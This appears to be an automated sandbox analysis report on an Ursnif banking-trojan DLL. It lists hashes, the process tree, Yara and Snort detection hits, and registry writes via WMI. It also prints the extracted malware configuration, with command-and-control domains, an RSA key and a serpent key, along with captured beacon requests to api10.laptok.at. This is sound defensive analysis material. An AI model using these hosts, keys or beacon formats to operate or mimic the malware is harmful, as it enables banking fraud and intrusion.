Play interactive tour

Edit tour

Windows Analysis Report 2e.dll

Overview

General Information

Sample Name:	2e.dll
Analysis ID:	498882
MD5:	92a0f1023e064a46fbf2e6bb697edf55
SHA1:	d2d28a35de82e8161266355a351a1e5822d49303
SHA256:	2e012edb93bb99de397b629cdc44d7516f9e6f47cd7106c93d2d6fd66a37af87
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Multi AV Scanner detection for domain / URL

Yara detected Ursnif

Writes or reads registry keys via WMI

Writes registry values via WMI

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Tries to load missing DLLs

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Queries the installation date of Windows

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

PE / OLE file has an invalid certificate

Contains functionality to call native functions

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 796 cmdline: loaddll32.exe 'C:\Users\user\Desktop\2e.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 5236 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4872 cmdline: rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 6632 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5044 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 3684 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5716 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3684 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "aHj/FBAOlIGEKeY7hJtySGbhiJ+OuJag0uZwD+z98lrXzI6cghioivt/zNqE6myavQkK1TvPguLqYjDl5wY423TG5cujR5I12+riFLmXU6yLpvCwEpgEflmuQBdLI5UmZ7PM966PLmgcotslJ9y1/jYsiD2WoJkIZSAKBnncJmMF7h9eqsKMXazDFT0yQ2hN", "c2_domain": ["api10.laptok.at/api1", "golang.feel500.at/api1", "go.in100k.at/api1"], "botnet": "1100", "server": "730", "serpent_key": "R13xH4JuHdOWL6Sg", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.803227069.0000000003A48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000003.899624754.0000000005768000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.1203393631.0000000003149000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000003.899679328.0000000005768000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.803315900.0000000003A48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.899458212.0000000005768000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.899498607.0000000005768000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.899414511.0000000005768000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.901603317.0000000005768000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.901405735.00000000030E0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000002.1203601349.0000000003A48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.803348643.0000000003A48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.803173940.0000000003A48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.901669349.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.803390693.0000000003A48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.1202749084.0000000000D60000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000003.900182748.0000000004CE9000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000003.899563679.0000000005768000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.803371540.0000000003A48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.899592894.0000000005768000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.1202777990.0000000000E00000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.803277362.0000000003A48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.803130026.0000000003A48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.899658912.0000000005768000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 796	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 4872	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.loaddll32.exe.e00000.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.30e0000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.e00000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.2f90000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.10000000.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.2f40000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.3.rundll32.exe.4ce94a0.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.31494a0.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.30e0000.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.2f90000.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.d60000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.10000000.4.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.fa0000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.10000000.4.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.31494a0.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.3.rundll32.exe.4ce94a0.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.d60000.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.10000000.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 13 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: 2e.dll

Avira: detected

Found malware configuration

Show sources

Source: 00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "aHj/FBAOlIGEKeY7hJtySGbhiJ+OuJag0uZwD+z98lrXzI6cghioivt/zNqE6myavQkK1TvPguLqYjDl5wY423TG5cujR5I12+riFLmXU6yLpvCwEpgEflmuQBdLI5UmZ7PM966PLmgcotslJ9y1/jYsiD2WoJkIZSAKBnncJmMF7h9eqsKMXazDFT0yQ2hN", "c2_domain": ["api10.laptok.at/api1", "golang.feel500.at/api1", "go.in100k.at/api1"], "botnet": "1100", "server": "730", "serpent_key": "R13xH4JuHdOWL6Sg", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}

Multi AV Scanner detection for submitted file

Show sources

Source: 2e.dll	Virustotal: Detection: 65%	Perma Link
Source: 2e.dll	Metadefender: Detection: 40%	Perma Link
Source: 2e.dll	ReversingLabs: Detection: 82%

Multi AV Scanner detection for domain / URL

Show sources

Source: api10.laptok.at

Virustotal: Detection: 14%

Perma Link

Source: 2.2.rundll32.exe.30e0000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.e00000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 2.2.rundll32.exe.10000000.3.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.10000000.4.unpack	Avira: Label: TR/Crypt.XPACK.Gen8

Source: 2e.dll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00FA7DD8 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

0_2_00FA7DD8

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49792 -> 87.106.18.141:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49792 -> 87.106.18.141:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49824 -> 87.106.18.141:80

Source: Joe Sandbox View

ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: Joe Sandbox View	IP Address: 87.106.18.141 87.106.18.141
Source: Joe Sandbox View	IP Address: 87.106.18.141 87.106.18.141

Source: msapplication.xml0.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Source: loaddll32.exe, 00000000.00000002.1203164560.0000000001760000.00000002.00020000.sdmp	String found in binary or memory: http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1P
Source: {DD28BAED-2779-11EC-90EB-ECF4BBEA1588}.dat.21.dr, ~DFB9EDA9C4DE41A518.TMP.21.dr	String found in binary or memory: http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5a
Source: {C2243AEB-2779-11EC-90EB-ECF4BBEA1588}.dat.15.dr	String found in binary or memory: http://api10.laptok.at/api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tX
Source: 2e.dll	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 2e.dll	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 2e.dll	String found in binary or memory: http://ocsp.sectigo.com0
Source: msapplication.xml.15.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.15.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.15.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.15.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.15.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.15.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.15.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.15.dr	String found in binary or memory: http://www.youtube.com/
Source: 2e.dll	String found in binary or memory: https://sectigo.com/CPS0D

Source: unknown

DNS traffic detected: queries for: api10.laptok.at

Source: global traffic	HTTP traffic detected: GET /api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tXHmCyMHbP9slqB1L8zpaC/nfhvJ6s58irru/pNJBMQ_2/B9Q8wSf7euVWpy0kLFFtWzz/vAwDCO_2Fo/3v4FyeGSRuSjMupWH/_2BEQ6znA7PT/8caxgyO1tr2/cTDPOBy_2FHAvv/tgKZ2JSY8uZo5PCTnq6VX/_2F2Vff20_2Fr9ux/TFmLX_2BIHd1Zmp/Jqw_2BLpi2pH8Zi61P/xEqI3ryES/n6BjkuL3N3RbBmMCK9xy/loeot0z7U9fUAU78A6C/ywgL0kQB0_2BMve6S_2Flf/2SujN_2Fl/B HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5acsxz5qxHDpv8YBmMuvj7/KGpLxQcloIDfE/SXYboMNK/ZGVNwVWGfnWgXZ7LibENrAZ/rGu1uarUfj/FSkhkIGZ0I6ED2ThT/iotSrHt6InUD/umvaUlfqIMb/01G4_2FdSHt_2F/JPI5oPhpcVsnT5eUGv8s0/LSKuaJdd_2FAe_2F/vQT2v29m9TEniEM/b63Yg6FSycj4oUXo8F/FUMOEIDKM/JTkYuf9RIKrVWGrferoc/GwDXbtZ7LjM2klfVose/Bk9CRR6n/Lu2z5l HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.803227069.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899624754.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899679328.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803315900.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899458212.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899498607.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899414511.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901603317.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203601349.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803348643.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803173940.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803390693.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899563679.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803371540.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899592894.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803277362.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803130026.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899658912.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4872, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.fa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203393631.0000000003149000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901405735.00000000030E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901669349.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202749084.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.900182748.0000000004CE9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202777990.0000000000E00000.00000040.00000001.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.803227069.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899624754.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899679328.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803315900.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899458212.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899498607.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899414511.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901603317.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203601349.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803348643.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803173940.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803390693.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899563679.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803371540.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899592894.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803277362.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803130026.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899658912.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4872, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.fa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203393631.0000000003149000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901405735.00000000030E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901669349.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202749084.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.900182748.0000000004CE9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202777990.0000000000E00000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: 2e.dll

